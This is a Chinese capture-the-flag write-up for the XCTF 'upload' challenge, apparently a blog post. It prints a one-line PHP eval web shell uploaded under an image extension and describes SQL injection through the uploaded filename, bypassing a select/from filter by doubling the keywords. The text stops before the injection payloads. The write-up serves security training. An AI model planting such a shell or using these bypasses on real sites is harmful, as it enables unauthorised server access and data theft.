攻防世界进阶upload

本文详细介绍了在攻防世界平台中一个关于upload的进阶挑战,涉及文件名注入漏洞。通过绕过过滤,使用CONV、substr、hex等函数获取数据库信息,最终揭示了flag所在的表名和列名,从而完成挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界进阶upload


注册登陆后,发现上传页面

试着上传一个文件3.php:
内容如下:

<?php eval(@$_POST['a']); ?>


我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去

虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败
看到回显名称有uid号,无奈的丝毫没有头绪
只好看了大佬的博客,竟然是注入,文件名称注入
当输入文件名为注入语句时,发现并没有反应,出现上传成功,但是并没有回显,可能存在过滤
尝试多次发现过滤的时select和from,所以利用selselectect和frfromom进行绕过

评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值